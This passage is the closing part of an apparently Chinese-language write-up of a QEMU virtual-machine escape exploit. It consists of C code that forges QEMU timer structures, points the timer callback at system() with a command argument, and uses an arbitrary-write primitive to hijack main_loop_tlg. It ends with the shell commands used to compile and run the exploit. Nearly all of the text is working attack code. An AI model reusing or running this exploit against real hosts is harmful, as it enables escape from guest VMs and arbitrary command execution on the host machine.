  void * fake_timer_list = code_leak +  FAKE_STRUCT;
  void * fake_timer = fake_timer_list +  sizeof(struct QEMUTimerList);

  void *system = code_leak + SYSTEM_PLT;
  void *cmd_addr = fake_timer + sizeof(struct QEMUTimer);
  /* Fake Timer List */
  tl->clock = (void *)(code_leak + QEMU_CLOCK);
  *(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000;
  tl->active_timers = fake_timer;
  tl->le_next = 0x0;
  tl->le_prev = 0x0;
  tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB;
  tl->notify_opaque = 0x0;
  tl->timers_done_ev = 0x0000000100000000;

  /*Fake Timer structure*/
  ts->timer_list = fake_timer_list;
  ts->cb = system;
  ts->opaque = cmd_addr;
  ts->scale = 1000000;
  ts->expire_time = -1;

  spray_id = rand() & 0xffff;
  size_t payload_size =
      sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd);

  printf("Writing fake structure : %pn",fake_timer_list);
  arbitrary_write(fake_timer_list,8,payload,payload_size,0x20);

  spray_id = rand() & 0xffff;
  void *  main_loop_tlg = code_leak + MAIN_LOOP_TLG;
  printf("Overwriting main_loop_tlg %pn",main_loop_tlg);
  arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20);
}

int main() {
    initialize();
    leak();
    pwn();
    return 0;
}

编译后执行效果如下:

$ sudo ifconfig ens3 mtu 12000 up
$ gcc -o exp exp.c
$ sudo ./exp

(完)